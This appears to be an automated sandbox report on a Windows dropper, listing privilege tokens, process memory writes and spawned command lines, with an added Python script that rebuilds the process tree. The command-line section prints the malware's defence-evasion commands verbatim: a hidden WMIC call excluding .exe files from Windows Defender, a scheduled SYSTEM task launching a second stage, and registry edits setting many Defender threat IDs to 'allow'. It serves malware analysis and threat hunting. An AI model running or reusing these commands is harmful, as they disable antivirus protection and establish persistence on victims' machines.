Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 648 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe
PID 648 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe
PID 648 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe
PID 3416 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3416 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3416 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4984 wrote to memory of 4468 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4984 wrote to memory of 4468 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4984 wrote to memory of 4468 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4468 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4468 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4468 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2388 wrote to memory of 2808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2388 wrote to memory of 2808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2388 wrote to memory of 2808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3416 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3416 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3416 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3016 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3016 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3016 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1304 wrote to memory of 3872 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1304 wrote to memory of 3872 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1304 wrote to memory of 3872 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3872 wrote to memory of 912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3872 wrote to memory of 912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3872 wrote to memory of 912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1904 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1904 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1904 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1560 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1560 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1560 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1200 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1200 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1200 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3732 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3732 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3732 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1640 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1640 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1640 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 4300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 4300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 4300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 2180 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 2180 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 2180 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3764 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3764 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3764 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 4100 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 4100 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 4100 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3516 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3516 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3516 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 2500 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 2500 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 2500 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1260 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
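The rows above record every WriteProcessMemory call the sandbox observed between a parent and the child it was creating, typically three per child, so the actual process lineage has to be reconstructed from them. The Python below is an added example and not part of the sandbox's own tooling: it parses rows in the printed format (a subset of the table is embedded as a constructed sample), collapses the duplicate rows into one edge with a write count, and renders the tree. It assumes the row layout shown above and image paths without spaces, which holds for every path in this report.

```python
import re
from collections import defaultdict

# One row of the WriteProcessMemory table as printed above. Image paths are
# matched with \S+, which holds for every path in this report (none contain
# spaces); a general parser would need the sandbox's structured export.
ROW_RE = re.compile(
    r"^PID (?P<ppid>\d+) wrote to memory of (?P<pid>\d+) N/A "
    r"(?P<pimg>\S+) (?P<cimg>\S+)$"
)

# Constructed sample: rows copied from the table above. The triplicate first
# row is kept on purpose; the sandbox logs one row per WriteProcessMemory
# call and a fresh child typically receives three writes during creation.
SAMPLE_ROWS = r"""
PID 648 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe
PID 648 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe
PID 648 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe
PID 3416 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4984 wrote to memory of 4468 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4468 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2388 wrote to memory of 2808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3416 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3016 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1304 wrote to memory of 3872 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3872 wrote to memory of 912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1904 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
"""


def basename(path):
    return path.rsplit("\\", 1)[-1]


def parse_rows(text):
    """Return (parent_of, image_of, write_counts).

    parent_of maps child PID -> parent PID, image_of maps PID -> image path,
    write_counts maps (parent, child) -> number of rows, i.e. how many
    WriteProcessMemory calls the sandbox saw for that pair."""
    parent_of, image_of, write_counts = {}, {}, defaultdict(int)
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # blank line, table header, or a row in another format
        ppid, pid = int(m["ppid"]), int(m["pid"])
        parent_of[pid] = ppid
        image_of.setdefault(ppid, m["pimg"])
        image_of.setdefault(pid, m["cimg"])
        write_counts[(ppid, pid)] += 1
    return parent_of, image_of, dict(write_counts)


def roots(parent_of):
    """PIDs that only ever appear as a writer: the table cannot say who
    started them. For this report that is the submitted sample (648) and
    LwcHoZo.exe (3016); the latter has no writer because the Task Scheduler,
    not a sandboxed process, launched it via the task created by schtasks."""
    return sorted(set(parent_of.values()) - set(parent_of))


def lineage(parent_of, image_of, pid):
    """Walk from pid up to its root; return image basenames root-first."""
    chain, seen = [], set()
    while pid is not None and pid not in seen:
        seen.add(pid)
        chain.append(basename(image_of[pid]))
        pid = parent_of.get(pid)
    return chain[::-1]


def render_tree(parent_of, image_of):
    """Indented process tree, one line per PID, duplicate rows collapsed."""
    children = defaultdict(list)
    for pid, ppid in parent_of.items():
        children[ppid].append(pid)
    lines = []

    def walk(pid, depth):
        lines.append("  " * depth + str(pid) + " " + basename(image_of[pid]))
        for child in sorted(children[pid]):
            walk(child, depth + 1)

    for root in roots(parent_of):
        walk(root, 0)
    return "\n".join(lines)


if __name__ == "__main__":
    parents, images, writes = parse_rows(SAMPLE_ROWS)
    print(render_tree(parents, images))
    print("write counts:", writes)
```

The gap the tree exposes is the useful part: 3016 (LwcHoZo.exe) has no parent in this table because it was started by the scheduled task, so a hunt that follows only parent-child edges from the dropped installer will stop at schtasks.exe and miss the second stage that does the Defender tampering.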

Processes

C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe

"C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe"

C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe

.\Install.exe /PdidDDD "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bEcIFlOHxifjjBuFoU" /SC once /ST 17:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exe\" 1V /VRsite_idOvc 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exe

C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exe 1V /VRsite_idOvc 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

